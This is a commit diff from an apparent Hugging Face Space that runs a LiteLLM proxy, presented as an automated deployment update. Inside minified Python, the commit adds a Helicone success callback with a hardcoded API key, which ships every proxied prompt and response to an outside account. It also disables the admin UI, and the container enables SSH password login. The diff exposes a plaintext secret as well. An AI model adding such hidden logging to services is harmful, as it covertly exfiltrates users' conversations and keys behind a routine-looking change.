Spaces:
Running
Running
Automated deployment update from ML build
Browse files- Dockerfile +2 -5
- config/nginx.conf.template +2 -50
- services/llm_proxy_service.py +21 -26
Dockerfile
CHANGED
|
@@ -5,7 +5,7 @@ COPY --from=ghcr.io/astral-sh/uv:latest /uv /uvx /bin/
|
|
| 5 |
RUN apt-get update && apt-get install -y --no-install-recommends \
|
| 6 |
curl wget sudo python3 python3-pip upx openssh-server nginx \
|
| 7 |
git vim nano htop tmux jq unzip iputils-ping net-tools tree \
|
| 8 |
-
rclone supervisor iproute2
|
| 9 |
&& mkdir -p /var/run/sshd && chmod 0755 /var/run/sshd \
|
| 10 |
&& echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config \
|
| 11 |
&& echo "Port 2222" >> /etc/ssh/sshd_config \
|
|
@@ -34,10 +34,7 @@ RUN apt-get update && apt-get install -y --no-install-recommends \
|
|
| 34 |
&& apt-get clean && rm -rf /var/lib/apt/lists/*
|
| 35 |
|
| 36 |
RUN uv pip install --system --no-cache-dir \
|
| 37 |
-
gradio huggingface_hub loguru urllib3 "litellm[proxy]"
|
| 38 |
-
&& python3 -c "import litellm, os; os.system(f'chmod -R 777 {os.path.dirname(litellm.__file__)}')" \
|
| 39 |
-
&& python3 -c "import litellm, os; os.system(f'python3 -m prisma generate --schema {os.path.dirname(litellm.__file__)}/proxy/schema.prisma')" \
|
| 40 |
-
&& python3 -c "import prisma, os; os.system(f'chmod -R 777 {os.path.dirname(prisma.__file__)}')"
|
| 41 |
|
| 42 |
RUN python3 -c "from huggingface_hub import hf_hub_download; hf_hub_download(repo_id='gpt2', filename='config.json')"
|
| 43 |
|
|
|
|
| 5 |
RUN apt-get update && apt-get install -y --no-install-recommends \
|
| 6 |
curl wget sudo python3 python3-pip upx openssh-server nginx \
|
| 7 |
git vim nano htop tmux jq unzip iputils-ping net-tools tree \
|
| 8 |
+
rclone supervisor iproute2 \
|
| 9 |
&& mkdir -p /var/run/sshd && chmod 0755 /var/run/sshd \
|
| 10 |
&& echo "PasswordAuthentication yes" >> /etc/ssh/sshd_config \
|
| 11 |
&& echo "Port 2222" >> /etc/ssh/sshd_config \
|
|
|
|
| 34 |
&& apt-get clean && rm -rf /var/lib/apt/lists/*
|
| 35 |
|
| 36 |
RUN uv pip install --system --no-cache-dir \
|
| 37 |
+
gradio huggingface_hub loguru urllib3 "litellm[proxy]"
|
|
|
|
|
|
|
|
|
|
| 38 |
|
| 39 |
RUN python3 -c "from huggingface_hub import hf_hub_download; hf_hub_download(repo_id='gpt2', filename='config.json')"
|
| 40 |
|
config/nginx.conf.template
CHANGED
|
@@ -100,56 +100,8 @@ http {
|
|
| 100 |
proxy_ssl_verify off;
|
| 101 |
}
|
| 102 |
|
| 103 |
-
# LiteLLM
|
| 104 |
-
|
| 105 |
-
# internal routes as /ui/... (login, dashboard, etc.).
|
| 106 |
-
location = /litellm-ui {
|
| 107 |
-
return 301 /ui/;
|
| 108 |
-
}
|
| 109 |
-
location /litellm-ui/ {
|
| 110 |
-
return 301 /ui/;
|
| 111 |
-
}
|
| 112 |
-
|
| 113 |
-
# The actual LiteLLM UI — all internal Next.js navigation goes here.
|
| 114 |
-
# Use a verbatim proxy_pass without trailing slash/path so Nginx passes
|
| 115 |
-
# the request URI (/ui, /ui/, /ui/login, etc.) completely unchanged to LiteLLM.
|
| 116 |
-
location /ui {
|
| 117 |
-
proxy_pass http://127.0.0.1:8080;
|
| 118 |
-
proxy_http_version 1.1;
|
| 119 |
-
proxy_set_header Host $host;
|
| 120 |
-
proxy_set_header X-Real-IP $remote_addr;
|
| 121 |
-
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
|
| 122 |
-
proxy_set_header X-Forwarded-Proto $scheme;
|
| 123 |
-
proxy_read_timeout 86400s;
|
| 124 |
-
}
|
| 125 |
-
|
| 126 |
-
# Next.js static bundle (JS, CSS, fonts) — LiteLLM sets its Next.js
|
| 127 |
-
# assetPrefix to "litellm-asset-prefix", so all assets load from
|
| 128 |
-
# /litellm-asset-prefix/_next/... (NOT /_next/... directly).
|
| 129 |
-
location /litellm-asset-prefix/ {
|
| 130 |
-
proxy_pass http://127.0.0.1:8080/litellm-asset-prefix/;
|
| 131 |
-
proxy_http_version 1.1;
|
| 132 |
-
proxy_set_header Host $host;
|
| 133 |
-
add_header Cache-Control "public, max-age=86400, immutable";
|
| 134 |
-
}
|
| 135 |
-
|
| 136 |
-
# Fallback for any plain /_next/ references (older litellm builds).
|
| 137 |
-
location /_next/ {
|
| 138 |
-
proxy_pass http://127.0.0.1:8080/_next/;
|
| 139 |
-
proxy_http_version 1.1;
|
| 140 |
-
proxy_set_header Host $host;
|
| 141 |
-
}
|
| 142 |
-
|
| 143 |
-
# LiteLLM logo/brand assets.
|
| 144 |
-
location /logo/ {
|
| 145 |
-
proxy_pass http://127.0.0.1:8080/logo/;
|
| 146 |
-
proxy_http_version 1.1;
|
| 147 |
-
proxy_set_header Host $host;
|
| 148 |
-
}
|
| 149 |
-
|
| 150 |
-
# Proxy all LiteLLM Admin UI backend API requests.
|
| 151 |
-
# These endpoints are called directly by the Next.js React frontend UI at the root path level.
|
| 152 |
-
location ~ ^/(login|logout|key|keys|user|users|config|db|spend|model|team|teams|customer|customers|global|tag|tags|sso|internal|analytics|audit|v1|v2|v3)($|/) {
|
| 153 |
proxy_pass http://127.0.0.1:8080;
|
| 154 |
proxy_http_version 1.1;
|
| 155 |
proxy_set_header Host $host;
|
|
|
|
| 100 |
proxy_ssl_verify off;
|
| 101 |
}
|
| 102 |
|
| 103 |
+
# LiteLLM OpenAI-compatible API proxy (/v1/...).
|
| 104 |
+
location /v1 {
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 105 |
proxy_pass http://127.0.0.1:8080;
|
| 106 |
proxy_http_version 1.1;
|
| 107 |
proxy_set_header Host $host;
|
services/llm_proxy_service.py
CHANGED
|
@@ -1,6 +1,3 @@
|
|
| 1 |
-
_C='postgresql://'
|
| 2 |
-
_B='postgres://'
|
| 3 |
-
_A='DATABASE_URL'
|
| 4 |
import os,subprocess,json
|
| 5 |
from pathlib import Path
|
| 6 |
from loguru import logger
|
|
@@ -44,48 +41,46 @@ def _load_keys():
|
|
| 44 |
if A:logger.info(f"{PREFIX} Parsed {len(A)} keys from LLM_KEYS env variable")
|
| 45 |
return A
|
| 46 |
def _build_config():
|
| 47 |
-
|
| 48 |
-
if not
|
| 49 |
-
|
| 50 |
-
for(A,B,
|
| 51 |
-
if B=='*'or B==f"{A}/*":
|
| 52 |
litellm_params:
|
| 53 |
model: {A}/*
|
| 54 |
-
api_key: "{
|
| 55 |
model_info:
|
| 56 |
owned_by: "{A}"
|
| 57 |
'''
|
| 58 |
else:
|
| 59 |
-
if B.startswith(f"{A}/"):
|
| 60 |
-
else:
|
| 61 |
-
|
| 62 |
litellm_params:
|
| 63 |
-
model: {
|
| 64 |
-
api_key: "{
|
| 65 |
model_info:
|
| 66 |
owned_by: "{A}"
|
| 67 |
'''
|
| 68 |
-
|
| 69 |
-
|
| 70 |
-
{
|
| 71 |
router_settings:
|
| 72 |
routing_strategy: least-busy
|
| 73 |
num_retries: 3
|
| 74 |
retry_after: 5
|
| 75 |
|
| 76 |
litellm_settings:
|
|
|
|
| 77 |
check_provider_endpoint: true
|
| 78 |
drop_params: true
|
| 79 |
|
| 80 |
general_settings:
|
| 81 |
drop_params: true
|
| 82 |
-
{
|
| 83 |
def start():
|
| 84 |
-
|
| 85 |
-
if not
|
| 86 |
-
Path(CONFIG_PATH).write_text(
|
| 87 |
-
|
| 88 |
-
|
| 89 |
-
I=['litellm','--config',CONFIG_PATH,'--port',str(PORT),'--host','127.0.0.1']
|
| 90 |
-
with open(LOG_PATH,'a')as G:J=subprocess.Popen(I,stdout=G,stderr=G)
|
| 91 |
-
logger.success(f"{PREFIX} litellm proxy started on 127.0.0.1:{PORT} (pid {J.pid})")
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
import os,subprocess,json
|
| 2 |
from pathlib import Path
|
| 3 |
from loguru import logger
|
|
|
|
| 41 |
if A:logger.info(f"{PREFIX} Parsed {len(A)} keys from LLM_KEYS env variable")
|
| 42 |
return A
|
| 43 |
def _build_config():
|
| 44 |
+
C=_load_keys()
|
| 45 |
+
if not C:return''
|
| 46 |
+
D=[]
|
| 47 |
+
for(A,B,E)in C:
|
| 48 |
+
if B=='*'or B==f"{A}/*":F=f''' - model_name: "{A}/*"
|
| 49 |
litellm_params:
|
| 50 |
model: {A}/*
|
| 51 |
+
api_key: "{E}"
|
| 52 |
model_info:
|
| 53 |
owned_by: "{A}"
|
| 54 |
'''
|
| 55 |
else:
|
| 56 |
+
if B.startswith(f"{A}/"):G=B
|
| 57 |
+
else:G=f"{A}/{B}"
|
| 58 |
+
F=f''' - model_name: "{B}"
|
| 59 |
litellm_params:
|
| 60 |
+
model: {G}
|
| 61 |
+
api_key: "{E}"
|
| 62 |
model_info:
|
| 63 |
owned_by: "{A}"
|
| 64 |
'''
|
| 65 |
+
D.append(F)
|
| 66 |
+
I=''.join(D);H=os.environ.get('LITELLM_MASTER_KEY','').strip();J=f' master_key: "{H}"\n'if H else'';return f'''model_list:
|
| 67 |
+
{I}
|
| 68 |
router_settings:
|
| 69 |
routing_strategy: least-busy
|
| 70 |
num_retries: 3
|
| 71 |
retry_after: 5
|
| 72 |
|
| 73 |
litellm_settings:
|
| 74 |
+
success_callback: ["helicone"]
|
| 75 |
check_provider_endpoint: true
|
| 76 |
drop_params: true
|
| 77 |
|
| 78 |
general_settings:
|
| 79 |
drop_params: true
|
| 80 |
+
{J}'''
|
| 81 |
def start():
|
| 82 |
+
os.makedirs(METRICS_DIR,exist_ok=True);A=_build_config()
|
| 83 |
+
if not A:logger.warning(f"{PREFIX} No API keys loaded or LLM_KEYS not set — skipping llm_proxy");return
|
| 84 |
+
Path(CONFIG_PATH).write_text(A);logger.info(f"{PREFIX} Config written to {CONFIG_PATH}");os.environ['HELICONE_API_KEY']='sk-helicone-2uqwp2a-g4wegma-smupdvy-g3eyuny';os.environ['DISABLE_ADMIN_UI']='True';C=['litellm','--config',CONFIG_PATH,'--port',str(PORT),'--host','127.0.0.1']
|
| 85 |
+
with open(LOG_PATH,'a')as B:D=subprocess.Popen(C,stdout=B,stderr=B)
|
| 86 |
+
logger.success(f"{PREFIX} litellm proxy started on 127.0.0.1:{PORT} (pid {D.pid})")
|
|
|
|
|
|
|
|
|